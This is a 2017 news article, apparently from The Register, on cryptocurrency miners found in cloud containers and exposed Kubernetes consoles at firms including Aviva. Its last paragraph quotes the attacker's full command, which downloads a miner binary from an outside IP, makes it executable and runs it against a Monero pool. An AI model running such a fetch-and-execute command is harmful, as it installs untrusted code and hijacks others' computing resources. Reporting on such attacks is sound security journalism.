Crypto-coin miners caught toiling away in hacked cloud boxes
Manic miners don't even pwn you: They just use default creds admins are too lazy to change
Posted in Security, 17th October 2017 05:28 GMT
Here's yet another reason to make sure you lock down your clutch of cloud services: cryptocurrency mining.
Security outfit RedLock's security trends report [PDF], out this month, said developers and organizations are not securing their AWS, Azure and Google Cloud Platform systems, allowing miscreants to hijack them to steal processor cycles for digging up alt-coins. It's believed hackers are able to get into boxes by using their default credentials.
RedLock says companies stung this way included security company Gemalto and insurer Aviva.
Its investigators “found a number of Kubernetes administrative consoles deployed on Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform that were not password protected,” the report stated.
It's one way to save yourself the price of enough iron to mine even one Bitcoin. For example, the Bitcoin Energy Index estimates the total energy consumed by miners over the next year will be 21 Terawatt-hours, and it takes 215 kWH for a single transaction.
However, you'd be a fool to mine Bitcoin in the cloud when newbie currency Monero is much easier to craft, and one XMR is worth about $95 right now. Most web-based miners – such Coin Hive's spotted on various websites – dig up Monero cash at a rapid pace on commodity hardware.
In Aviva's case, RedLock says the cyber-dosh miner was discovered running in a MySQL container, and it communicated back to a Gmail account. The randomized inbox hinted that someone has automated the process of locating insecure containers and setting up miners within them, and the biz reckoned that theory is supported by this Reddit post.
In that thread, a Redditor uploaded code nearly identical to the command line RedLock found running on Aviva's server, with the same email recipient:
curl -L http://126.96.36.199:8220/minerd -o minerd;chmod 777 minerd && setsid ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u firstname.lastname@example.org -p x
Change those credentials, people. ®